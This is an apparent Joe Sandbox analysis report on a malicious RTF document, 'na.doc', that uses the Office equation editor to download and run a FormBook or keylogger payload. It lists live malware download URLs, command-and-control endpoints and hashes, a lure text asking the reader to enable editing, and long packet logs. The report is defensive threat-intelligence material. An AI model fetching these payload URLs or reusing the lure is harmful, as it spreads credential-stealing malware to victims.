                                                                                                                                                                              http://www.lifeofthobes.ukReferer:explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://www.opmk.monster/btrd/explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.213.45 | thecareskin.com | United States | 16509 | AMAZON-02US | true
87.120.84.38 | unknown | Bulgaria | 51189 | SHARCOM-ASBG | true
68.66.226.117 | fcno30.com | United States | 55293 | A2HOSTINGUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545184
Start date and time: 2024-10-30 08:36:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: na.doc
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@13/14@10/3
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 108
• Number of non-executed functions: 257
Cookbook Comments:
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
• Override analysis time to 78467.8162587296 for current running targets taking high CPU consumption
• Override analysis time to 156935.632517459 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 3568 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: na.doc
Time | Type | Description
03:37:25 | API Interceptor | 265x Sleep call for process: EQNEDT32.EXE modified
03:37:29 | API Interceptor | 80x Sleep call for process: ihbgfbin.exe modified
03:37:35 | API Interceptor | 17x Sleep call for process: powershell.exe modified
03:37:38 | API Interceptor | 6724x Sleep call for process: explorer.exe modified
03:37:39 | API Interceptor | 12892634x Sleep call for process: mstsc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.213.45 | firmware.sh4.elf | malicious | Unknown | 13.248.213.45/
13.248.213.45 | irlsever.doc | malicious | FormBook | www.microsofr.fun/omnp/
13.248.213.45 | Wk8eTHnajw.elf | malicious | Unknown | bizvegan.com/
13.248.213.45 | Tenuto.exe | malicious | FormBook, GuLoader, LummaC Stealer | www.osbornesargent.co.uk/md49/
87.120.84.38 | na.doc | malicious | Snake Keylogger, VIP Keylogger | 87.120.84.38/txt/pgTQ4mfZBbJhpdd.exe
87.120.84.38 | na.doc | malicious | Snake Keylogger, VIP Keylogger | 87.120.84.38/txt/pKL9HXcZosWfPt1.exe
87.120.84.38 | na.doc | malicious | Snake Keylogger, VIP Keylogger | 87.120.84.38/txt/qHbynE8Vgwabsy3.exe
87.120.84.38 | na.doc | malicious | Snake Keylogger, VIP Keylogger | 87.120.84.38/txt/CLLPdgxhnmwGf5Y.exe
87.120.84.38 | Proforma Invoice347.doc | malicious | Nanocore | 87.120.84.38/txt/gseTC3ENkK2egL4.exe
87.120.84.38 | Proforma-Invoice#018879TT0100..doc | malicious | Snake Keylogger, VIP Keylogger | 87.120.84.38/txt/f2rPs6mHkljoAcH.exe
87.120.84.38 | na.doc | malicious | MassLogger RAT | 87.120.84.38/txt/SXYQ5lPZwknTuMP.exe
87.120.84.38 | na.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 87.120.84.38/txt/ixsT7yV1KrQcQ4E.exe
87.120.84.38 | na.doc | malicious | Snake Keylogger, VIP Keylogger | 87.120.84.38/txt/1SccExdhYCwi9NS.exe
87.120.84.38 | na.doc | malicious | VIP Keylogger | 87.120.84.38/txt/MnXcvVpLaWYuiO.exe
68.66.226.117 | LPOH2401-3172(Mr.Kem Sophea)-pdf.exe | malicious | FormBook | www.fcno30.com/btrd/?E2MXNj=Aqp/nEcilvTl9R8aQsSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hj1JjExYXO0x&bt-=XVJdUxa8
68.66.226.117 | https://l.wl.co/l?u=http://mercedes.krisliu.homes/eE9HQTEsVE9XRVIsMCwsMCws | malicious | Unknown | mercedes.krisliu.homes/_meetups/r.php?click_id=TOWER&country_code=ro&user_agent=web&ip_address=81.181.57.74&user_lp=imonetizeit
68.66.226.117 | 4wnssyl130.exe | malicious | FormBook, zgRAT |
                                                                                                                                                                                  • www.fcno30.com/btrd/?GzuD=Aqp/nEcilvTl9R8aQsSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hj5wvldYAIogC0vuGw==&ArH=M2MxwHKpo
                                                                                                                                                                                  REF-10113128.docGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?glX0D0=Aqp/nEdW5fSRgBppOcSBDZbXY4IaYVD9lzqE2utQjmbccywWz39dK6w1iF5Po1lTCoAGbA==&SBZ=w884VlJHidf4vn
                                                                                                                                                                                  nellyzx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?3fKt=-ZZhER_hvZV4&Q87xgDQX=Aqp/nEdT5YSVgRllMcSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hgVzzVRgNpV2
                                                                                                                                                                                  s6hzASJHMG.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?X2MxX2=Aqp/nEdT5YSVgRllMcSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hj5wvldYAIogC0vuGw==&l0GP=9r3hKLVp
                                                                                                                                                                                  HBXTWbhD3l.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?ZJEHa2=9rWhZDNX&Ht=Aqp/nEdT5YSVgRllMcSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hj5JwU9bOe0nC0vpVA==
                                                                                                                                                                                  tihldYrCBU.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?2dtd7DI=Aqp/nEdT5YSVgRllMcSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hgVzzVRgNpV2&8p=8pQHW
                                                                                                                                                                                  bolazx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?W4=Aqp/nEdT5YSVgRllMcSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hgVzzVRgNpV2&5jK=EL0dqTlXxPK8I
Associated Sample Name / URL | Detection | Threat Name (Context listed as a bullet under each row; Match given per group)
Match: SHARCOM-ASBG
na.doc | malicious | Snake Keylogger, VIP Keylogger
• 87.120.84.38
na.doc | malicious | Snake Keylogger, VIP Keylogger
• 87.120.84.38
na.doc | malicious | Snake Keylogger, VIP Keylogger
• 87.120.84.38
na.doc | malicious | Snake Keylogger, VIP Keylogger
• 87.120.84.38
zxalphamn.doc | malicious | Lokibot
• 87.120.84.39
Proforma Invoice347.doc | malicious | Nanocore
• 87.120.84.38
Proforma-Invoice#018879TT0100..doc | malicious | Snake Keylogger, VIP Keylogger
• 87.120.84.38
na.doc | malicious | MassLogger RAT
• 87.120.84.38
na.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
• 87.120.84.38
na.doc | malicious | Snake Keylogger, VIP Keylogger
• 87.120.84.38
Match: A2HOSTINGUS
http://mhmgc.com/ | malicious | HTMLPhisher
• 85.187.128.10
yGktPvplJn.exe | malicious | Pushdo
• 104.218.10.254
la.bot.sh4.elf | malicious | Unknown
• 104.255.192.7
Bill Of Lading_MEDUVB935991.pdf.exe | malicious | FormBook
• 68.66.226.116
TT Swift copy1.exe | malicious | FormBook
• 66.198.240.15
mirai.mpsl.elf | malicious | Mirai
• 68.66.247.81
AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe | malicious | FormBook
• 68.66.226.116
https://keysmix.com/ | malicious | Unknown
• 209.124.66.8
bIb2gpepKH.elf | malicious | Mirai
• 162.254.255.6
PO59458.exe | malicious | FormBook
• 66.198.240.15
Match: AMAZON-02US
file.exe | malicious | Credential Flusher
• 13.32.99.66
Payment&WarantyBonds.exe | malicious | FormBook
• 13.248.169.48
Order pdf.exe | malicious | DBatLoader, FormBook
• 185.166.143.49
Proforma Fatura ektedir.exe | malicious | DBatLoader, FormBook
• 185.166.143.49
Order Pdf.exe | malicious | DBatLoader
• 52.217.116.65
SuNMTBkfPo.elf | malicious | Unknown
• 108.137.225.79
Proforma Fatura ektedir.exe | malicious | DBatLoader
• 185.166.143.50
Order Pdf.exe | malicious | DBatLoader
• 185.166.143.48
B6eg13TpEH.elf | malicious | Unknown
• 18.140.171.43
vHnFyxemFf.elf | malicious | Unknown
• 18.182.10.178
No context
No context

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Reputation:high, very likely benign file
Preview:@...e...........................................................

Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):662016
Entropy (8bit):7.943111027493155
Encrypted:false
SSDEEP:12288:INaDPw1Qk89Tmya4B/wP1mlYz5zdTpndwFPVw5XZdZi0pZvSrP7+2xO:IULw9gTFygYjdeFPVw5XFi6Zvv2xO
MD5:6A39668F48A502DBFA3CC13C7F463281
SHA1:00D040A6A3125FA7D929BF7930BC3088D9761B91
SHA-256:1331A8B126688B8C66B1B6A349502D7E7814B4F765C752440C756C90F0E9AE07
SHA-512:8514CF235A04E4ACDB71E3C0FC89702B60A62413ED25AE4695B8AA17A373E6C45D5EB7E193523E4B47406001ADEB92D165AB3C1C69B424A057C69C535E0F7894
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.!g..............0.................. ... ....@.. .......................`............@.....................................O.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@..@.reloc.......@......................@..B........................H........q...g...............D...........................................0...........(......(.....+..*...0...........(.......(.....+..*..0...........(........(.....+..*.0...........(.........(.....+..*....0...........(...........(.....+..*..0...........(.............(.....+..*....0.................(.......(.....+..*....0.................(........(.....+..*...0.................(.........(.....+..*..0.................(...........( ....+..*....0.................(.............(!.

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:CE338FE6899778AACFC28414F2D9498B
SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.3537739773049609
Encrypted: false
SSDEEP: 3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbg:IiiiiiiiiifdLloZQc8++lsJe1Mzz
MD5: EBCDBE016B17501963F7C202AFE63BEC
SHA1: AF7AFA0CB70DFB8467CCEE44830C69433EFD1C51
SHA-256: 670AFD41732C36769EFAB8CAF4CFD330D945B378FE659E3D6D2680155FA94D87
SHA-512: 6A2877A0B4593C3F828F3410BEED2F4E9D11821E146B6AB15BADC1AA42CA3AC27EFBE809D05BA63E2BE06AE5C1C40E062DF0B09B3A4C454BA12E46933241CBFF
Malicious: false

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 868352
Entropy (8bit): 3.40390270485409
Encrypted: false
SSDEEP: 6144:myemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryem:S
MD5: DBA27F8A6C89E226B96F1C55C23B7695
SHA1: 6B04EE0BB9734557DBD63DB9ADD63C7EA9F3E9D4
SHA-256: F14E43C7063E719D9266F8DCA1A434D8CDF709B08DA294CFCF2239DDA3FC7606
SHA-512: 7269A4D4B80298EF03F0ADCD07451C809C6CF65B3C16066389C5FD3A0762A8B5F8F99792067E98F9F7CA995D2A8ADA57762B885D965DD0DC3B72DCBACE3CBF5E
Malicious: false
Preview (UTF-16LE text, decoded): 83744068please click Enable editing from the yellow bar above.The independent auditors’ opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Generic INItialization configuration [folders]
Category: dropped
Size (bytes): 38
Entropy (8bit): 4.195295934496219
Encrypted: false
SSDEEP: 3:M19m42Uv:M9
MD5: 85AFAECA1F119568BFA70BB4ED76F108
SHA1: 13DA0EB4D0361D0A4CD1DD38DBECA56DEB273457
SHA-256: 3211DF2212BAF22DF462140F37EC16A81483BFB4DE4796F24A0708390601F0F8
SHA-512: 4E5C577D753BF15471DA27D3EEE34FCE86E388414FA1177E3BCF877827C82750F23C8EDB64B83CF7E55C69D5FCB2BD18941E81A353F8458A0685D358C1E9D3A6
Malicious: false
Preview: [doc]..na.LNK=0..[folders]..na.LNK=0..

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Wed Oct 30 06:37:24 2024, length=1189943, window=hide
Category: dropped
Size (bytes): 968
Entropy (8bit): 4.546344517361014
Encrypted: false
SSDEEP: 12:8aCvb0E0gXg/XAlCPCHaXxB4fB/qPX+WcVu3ImicvbWI8DtZ3YilMMEpxRljKVTQ:8aCvdk/XThe4ouYeCDDv3q857u
MD5: 9CD911BAD0DE07567B178A065D408D15
SHA1: F3E70FEDAB118BE8D0C30AD30920362FE119FA21
SHA-256: D45DC9024A9ED99B0E73D763C0B0B2DAAEB43B05E90EF7288D9CF80FEC33F8E2
SHA-512: CE1C906CF3DA2DD15D1DAED3219A0F777CA61E2F450CE5C250937815E8F8A317A7CB21BC2710BA6D6F159E1E468EFC6A49174E5F7EEF8FE0BCFC57A19D600083
Malicious: false

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyhGlvAhuWhlkf9ln:vdsCkWtl6hnlOl
MD5: 804390E644FA0474477DF3E9CF0D414F
SHA1: DD3A35414FDE3DA61F605290145BBF4C16C3F3F7
SHA-256: 8B776BAF7BB823DACC0EC849005404DC9485B8B628B47EAF9017DE8CDB8650D3
SHA-512: 35915649801D7E8BCD5F5571DBF9209BB6E2FE370C518529C8FDA60ED9EA1E253FF0C1F1C197ADD2429A8FDB3B9A5A06C7B2EFEA14B613964720AD9CD057FF25
Malicious: false
Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Preview: ..

Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 662016
Entropy (8bit): 7.943111027493155
Encrypted: false
SSDEEP: 12288:INaDPw1Qk89Tmya4B/wP1mlYz5zdTpndwFPVw5XZdZi0pZvSrP7+2xO:IULw9gTFygYjdeFPVw5XFi6Zvv2xO
MD5: 6A39668F48A502DBFA3CC13C7F463281
SHA1: 00D040A6A3125FA7D929BF7930BC3088D9761B91
SHA-256: 1331A8B126688B8C66B1B6A349502D7E7814B4F765C752440C756C90F0E9AE07
SHA-512: 8514CF235A04E4ACDB71E3C0FC89702B60A62413ED25AE4695B8AA17A373E6C45D5EB7E193523E4B47406001ADEB92D165AB3C1C69B424A057C69C535E0F7894
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyhGlvAhuWhlkf9ln:vdsCkWtl6hnlOl
MD5: 804390E644FA0474477DF3E9CF0D414F
SHA1: DD3A35414FDE3DA61F605290145BBF4C16C3F3F7
SHA-256: 8B776BAF7BB823DACC0EC849005404DC9485B8B628B47EAF9017DE8CDB8650D3
SHA-512: 35915649801D7E8BCD5F5571DBF9209BB6E2FE370C518529C8FDA60ED9EA1E253FF0C1F1C197ADD2429A8FDB3B9A5A06C7B2EFEA14B613964720AD9CD057FF25
Malicious: true

File type: Nim source code, Non-ISO extended-ASCII text, with very long lines (65276), with CR line terminators
Entropy (8bit): 3.8695817496843667
TrID:
• Rich Text Format (4004/1) 100.00%
File name: na.doc
File size: 1'189'943 bytes
MD5: 1e6c06ed300dd4d6744f43efd6cc36a2
SHA1: 8aaece78eaab5c434c8b9a88a1b154a09f800d16
SHA256: dbde17546d423c444465c7f4bbecd593e99c4d43136269bb7f1f3be544d716eb
SHA512: f6b6d4c2e51b250f1b0cc6ba68fe5d64aef88108d1273f23fbc0ec88de3802af1bba7bde66f5066c25ec0a3104148c9582032a65369747d3c0d767e070066a0c
SSDEEP: 6144:hwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAP:RD3
TLSH: CE45072DD34B02598F620377AB571E5142BDBA7EF38552B1302C537933EAC39A1252BE
File Content Preview: {\rt..{\*\Q0CyzYzYbskJZdq7zz7bsZwgIhfNvrDvtK17fB9qPVhtUqN8ApUjjG2ofE4DEYNc9YOtivFb01GtPFWYOmnJUXgVcKynYPJIi55xAgX1vpDyOmYWBFp0AGBvdQBlvLH67Ksw4NJEhJLlRLmC6dLSnNoDHuRnPFZCuhYWSsqOquRwapSleL8KQlqX4CYW02TkcbuLL8RfuzG9t8sLNmzH4LY3YhHdkcFukQh5l0LDQ0b3MCK6nLfxl
Icon Hash: 2764a3aaaeb7bdbf

Suricata IDS alerts:

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-30T08:37:29.702583+0100 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | 1 | 87.120.84.38 | 80 | 192.168.2.22 | 49163 | TCP
2024-10-30T08:37:30.054009+0100 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | 1 | 87.120.84.38 | 80 | 192.168.2.22 | 49163 | TCP
2024-10-30T08:37:30.054009+0100 | 2827449 | ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123) | 1 | 87.120.84.38 | 80 | 192.168.2.22 | 49163 | TCP
2024-10-30T08:38:51.849816+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.22 | 49164 | 13.248.213.45 | 80 | TCP
2024-10-30T08:38:51.849816+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.22 | 49164 | 13.248.213.45 | 80 | TCP
2024-10-30T08:38:51.849816+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.22 | 49164 | 13.248.213.45 | 80 | TCP
2024-10-30T08:40:34.568080+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.22 | 49165 | 68.66.226.117 | 80 | TCP
2024-10-30T08:40:34.568080+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.22 | 49165 | 68.66.226.117 | 80 | TCP
2024-10-30T08:40:34.568080+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.22 | 49165 | 68.66.226.117 | 80 | TCP
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056215048 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056232929 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056262016 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056266069 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056303024 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056313038 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056359053 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057018042 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057070017 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057087898 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057106972 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057131052 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057140112 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057148933 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057177067 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057205915 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057226896 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057908058 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057960033 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057976007 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057996988 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058017015 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058031082 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058047056 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058068037 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058085918 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058124065 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058840990 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058893919 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058912992 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058929920 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058954954 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058963060 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058975935 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058999062 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059014082 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059051991 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059700966 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059740067 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059771061 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059793949 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059798002 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059833050 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059851885 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059868097 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059890032 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059927940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060651064 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060712099 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060715914 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060751915 CET804916387.120.84.38192.168.2.22
